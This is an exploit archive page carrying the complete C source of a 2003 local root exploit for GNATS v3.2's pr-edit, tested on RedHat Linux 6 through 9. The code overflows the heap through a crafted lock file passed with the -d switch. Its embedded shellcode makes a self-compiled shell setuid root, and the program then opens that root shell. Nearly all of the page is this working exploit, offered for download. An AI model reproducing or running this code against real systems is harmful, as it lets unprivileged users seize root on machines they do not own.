exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

0x82-GNATS_own.c

0x82-GNATS_own.c
Posted Jun 22, 2003
Authored by Xpl017Elz | Site inetcop.org

Local root exploit against GNATS v3.2 that makes use of the heap overflow found in the -d switch. Related advisory found here. Tested against RedHat Linux versions 6-9.

tags | exploit, overflow, local, root
systems | linux, redhat
SHA-256 | f5b477f0da8c0952aa1d3d05cdefb6691ea408d719dd83bb53879868bfcc2873
Download | Favorite | View

0x82-GNATS_own.c

Change Mirror Download
/*
**
** GNATS v3.2 (The GNU bug-tracking system) local root 0day exploit
**
** Tested RedHat Linux 6.x,7.x (also, 8.x,9.x)
**
** -- 
** exploit by "you dong-hun"(Xpl017Elz), <szoahc@hotmail.com>. 
** My World: http://x82.i21c.net & http://x82.inetcop.org
*/
/* -=-= POINT! POINT! POINT! POINT! POINT! =-=-
**
** [?] Why is root setuid established in Linux?
**
** When install, user who is gnats must exist to system.
** If don't exist, setuid has been established by root's uid.
**
*/

#include <stdio.h>
#include <unistd.h>
#include <stdlib.h>
#include <sys/stat.h>

#define DF_SIZE (255)
#define T_G "/usr/local/lib/gnats/pr-edit" /* It's Default path */
#define DF_LK_NM "./x82" /* User,Lock: x82 */
#define DF_MK_DIR "/tmp/"
#define DF_BK_SHL "/tmp/gnats-0day"
#define GCC_V_DEF (1)

void own_banrl();
void own_usage(char *own_f_nm);
int __gnats_adm_mkdir();
int __gants_adm_gnats_dot_lock_flow(u_long own_sh,int gv_type);
void psh_addr(FILE *fp,u_long addr);
int make_sh(char *own_d_nm);

struct stat s_t;
char df_mk_dir[(DF_SIZE)]; /* gnats-adm dir path */
char df_mk_lk[(DF_SIZE)]; /* user.lock file path */
char df_mk_tmp[(DF_SIZE)]; /* gnats.lock file path */
char shellcode[(DF_SIZE)]={
  /* chown root: ;chmod 6755 ; */
  0x90,0x40,0x90,0x40,0x90,0x40,0x90,0x40,
  0x90,0x40,0x90,0x40,0x90,0x40,0x90,0x40,
  0x90,0x40,0x90,0x40,0x90,0x40,0x90,0x40,
  0x90,0x40,0x90,0x40,0x90,0x40,0x90,0x40,
  0xeb,0x1d,0x5e,0x31,0xc0,0xb0,0xb6,0x89,
  0xf3,0x31,0xc9,0x31,0xd2,0xcd,0x80,0x31,
  0xc0,0xb0,0x0f,0x66,0xb9,0xed,0x0d,0xcd,
  0x80,0xb0,0x01,0x31,0xdb,0xcd,0x80,0xe8,
  0xde,0xff,0xff,0xff
};

int make_sh(char *own_d_nm)
{
  FILE *fp;
  char d_src[(DF_SIZE)];
  char st_exec[(DF_SIZE)*2];
  
  memset((char *)d_src,0,sizeof(d_src));
  snprintf(d_src,sizeof(d_src)-1,"%s.c",own_d_nm);
  if((fp=fopen(d_src,"w"))==(NULL))
  {
    return(-1);
  }
  fprintf(fp,"main()\n"
    "{\n"
    "setreuid(0,0);"
    "setregid(0,0);"
    "setuid(0);"
    "setgid(0);"
    "system(\"sh -p\");"
    "\n}\n");
  fclose(fp);
  
  memset((char *)st_exec,0,sizeof(st_exec));
  snprintf(st_exec,sizeof(st_exec)-1,
    "gcc -o %s %s >/dev/null 2>&1",own_d_nm,d_src);
  system(st_exec);
  unlink(d_src);
  
  if(stat(own_d_nm,&s_t)==(0))
  {
    return(0);
  }
  else return(-1);
}

void own_banrl()
{
  fprintf(stdout,"\n GNATS v3.2 (The GNU bug-tracking system) local root exploit.\n");
  fprintf(stdout,"                                                by Xpl017Elz.\n\n");
}
void own_usage(char *own_f_nm)
{
  fprintf(stdout," Usage: %s -option [argument]\n\n",own_f_nm);
  fprintf(stdout,"\t -p [pr-edit path]  : GNATS pr-edit path.\n",(T_G));
  fprintf(stdout,"\t -t [target num]    : Select gcc version number.\n",(GCC_V_DEF));
  fprintf(stdout,"\t\t\t{0} : gcc old version.\n");
  fprintf(stdout,"\t\t\t{1} : gcc new version.\n");
  fprintf(stdout,"\t -b [target path]   : setuid shell path.\n");
  fprintf(stdout,"\t -h                 : Help information.\n\n");
  fprintf(stdout," Example: %s -p%s -t%d -b%s\n\n",own_f_nm,(T_G),(GCC_V_DEF),(DF_BK_SHL));
  exit(0);
}

int __gnats_adm_mkdir()
{
  memset((char *)df_mk_dir,0,sizeof(df_mk_dir));
  memset((char *)df_mk_tmp,0,sizeof(df_mk_tmp));
  snprintf(df_mk_dir,sizeof(df_mk_dir)-1,"%s/gnats-adm/",(DF_MK_DIR));
  snprintf(df_mk_tmp,sizeof(df_mk_tmp)-1,"%s/gnats-adm/gnats.lock",(DF_MK_DIR));
  mkdir(df_mk_dir,0x1ed);
  if((stat(df_mk_dir,&s_t)==(0))&&(S_ISDIR(s_t.st_mode)))
  {
    return(0);
  }
  else return(-1);
}

void psh_addr(FILE *fp,u_long addr)
{
  u_char __bf[4];
  memset((u_char *)__bf,0,sizeof(__bf));
  {
    __bf[0]=(addr&0x000000ff)>>0;
    __bf[1]=(addr&0x0000ff00)>>8;
    __bf[2]=(addr&0x00ff0000)>>16;
    __bf[3]=(addr&0xff000000)>>24;
  }
  fprintf(fp,"%c%c%c%c",__bf[0],__bf[1],__bf[2],__bf[3]);
}

int __gants_adm_gnats_dot_lock_flow(u_long own_sh,int gv_type)
{
  FILE *fp;
  int g_g_nm;
#define DF_FIRST_JNK (1024)
#define DF_SECOND_JNK (100)
  int fst_junk_n=(DF_FIRST_JNK);
  int scn_junk_n=(DF_SECOND_JNK);

  memset((char *)df_mk_lk,0,sizeof(df_mk_lk));
  snprintf(df_mk_lk,sizeof(df_mk_lk)-1,"%s/x82.lock",(DF_MK_DIR));

  if(gv_type)
  {
    fst_junk_n+=8;
    scn_junk_n+=28;
  }
  if((fp=fopen(df_mk_lk,"w"))==(NULL))
  {
    return(-1);
  }
  for(g_g_nm=(0);g_g_nm<fst_junk_n;g_g_nm++)
  {
    fprintf(fp,"F");
  }
  (void)psh_addr(fp,(u_long)stdout);
  for(g_g_nm=(0);g_g_nm<scn_junk_n;g_g_nm++)
  {
    fprintf(fp,"S");
  }
  (void)psh_addr(fp,(u_long)own_sh);
  fclose(fp);
}

int main(int argc,char **argv)
{
  int w_g_dot_f;
  pid_t fk_pid;
  u_long own_sh_addl;
  char *own_exect[2];
  int gcc_v_on=(GCC_V_DEF);
  char pth_own[(DF_SIZE)]=(T_G);
  char bck_own[(DF_SIZE)]=(DF_BK_SHL);

  (void)own_banrl();
  while((w_g_dot_f=getopt(argc,argv,"P:p:T:t:B:b:Hh"))!=EOF)
  {
    extern char *optarg;
    switch(w_g_dot_f)
    {
      case 'P':
      case 'p':
        memset((char *)pth_own,0,sizeof(pth_own));
        strncpy(pth_own,optarg,sizeof(pth_own)-1);
        break;
        
      case 'T':
      case 't':
        if((gcc_v_on=(atoi(optarg)))>1)
        {
          (void)own_usage(argv[0]);
        }
        break;
        
      case 'B':
      case 'b':
        memset((char *)bck_own,0,sizeof(bck_own));
        strncpy(bck_own,optarg,sizeof(bck_own)-1);
        break;
        
      case 'H':
      case 'h':
        (void)own_usage(argv[0]);
               break;
         
      case '?':
               (void)own_usage(argv[0]);
               break;
    }
  }

  fprintf(stdout," [0] Start, exploit.\n");
  if((stat((pth_own),&s_t)!=(0)))
  {
    fprintf(stderr," [-] pr-edit path: %s not found.\n\n",(pth_own));
    exit(-1);
  }
  fprintf(stdout," [+] exploit target: %s\n",(pth_own));
  fprintf(stdout," [1] Make setuid shell.\n");
  if((int)make_sh(bck_own)==(-1))
  {
    fprintf(stderr," [-] exploit failed.\n\n");
    exit(-1);
  }
  fprintf(stdout," [+] Setuid shell path: %s\n",(bck_own));
  fprintf(stdout," [2] Shellcode setting.\n");
  {
    own_sh_addl=((0xbfffffff)-(strlen(shellcode)+strlen(bck_own)));
    strncat(shellcode,bck_own,sizeof(shellcode)-strlen(shellcode)-1);
    own_exect[0]=(shellcode);
    own_exect[1]=(NULL);
  }
  fprintf(stdout," [+] Shellcode address: %p\n",own_sh_addl);
  fprintf(stdout," [3] Make `gnats-adm' directory.\n");
  if((__gnats_adm_mkdir())==(-1))
  {
    fprintf(stderr," [-] make directory failed.\n\n");
    exit(-1);
  }
  fprintf(stdout," [4] Make user.lock file.\n");
  if((__gants_adm_gnats_dot_lock_flow(own_sh_addl,gcc_v_on))==(-1))
  {
    fprintf(stderr," [-] make lockfile failed.\n\n");
    exit(-1);
  }
  fprintf(stdout," [+] Execute, Shellcode !!\n\n");
  if((fk_pid=fork())==(0))
  {
    execle(pth_own,pth_own,"-l",(DF_LK_NM),"-d",(DF_MK_DIR),(DF_LK_NM),(NULL),own_exect);
  }
  wait(&fk_pid);
  fprintf(stdout,"\n [5] Remove setting dir, files.\n");
  unlink(df_mk_lk);
  unlink(df_mk_tmp);
  rmdir(df_mk_dir);

  if((stat(bck_own,&s_t)==(0))&&(s_t.st_mode&S_ISUID))
  {
    fprintf(stdout," [+] exploit successfully.\n");
    fprintf(stdout," [*] It's root shell !!\n\n");
    execl((bck_own),(bck_own),(NULL));
  }
  else
  {
    fprintf(stderr," [-] exploit failed.\n\n");
    exit(-1);
  }
}

/* eoc */

Login or Register to add favorites

File Archive:

November 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Nov 1st
    30 Files
  • 2
    Nov 2nd
    0 Files
  • 3
    Nov 3rd
    0 Files
  • 4
    Nov 4th
    12 Files
  • 5
    Nov 5th
    44 Files
  • 6
    Nov 6th
    18 Files
  • 7
    Nov 7th
    9 Files
  • 8
    Nov 8th
    8 Files
  • 9
    Nov 9th
    3 Files
  • 10
    Nov 10th
    0 Files
  • 11
    Nov 11th
    14 Files
  • 12
    Nov 12th
    20 Files
  • 13
    Nov 13th
    63 Files
  • 14
    Nov 14th
    18 Files
  • 15
    Nov 15th
    8 Files
  • 16
    Nov 16th
    0 Files
  • 17
    Nov 17th
    0 Files
  • 18
    Nov 18th
    18 Files
  • 19
    Nov 19th
    7 Files
  • 20
    Nov 20th
    13 Files
  • 21
    Nov 21st
    6 Files
  • 22
    Nov 22nd
    48 Files
  • 23
    Nov 23rd
    0 Files
  • 24
    Nov 24th
    0 Files
  • 25
    Nov 25th
    60 Files
  • 26
    Nov 26th
    0 Files
  • 27
    Nov 27th
    44 Files
  • 28
    Nov 28th
    0 Files
  • 29
    Nov 29th
    0 Files
  • 30
    Nov 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Site Links
News by Month
News Tags
Files by Month
File Tags
File Directory
About Us
History & Purpose
Contact Information
Terms of Service
Privacy Statement
Copyright Information
Services
Security Services
Hosting By
Rokasec
close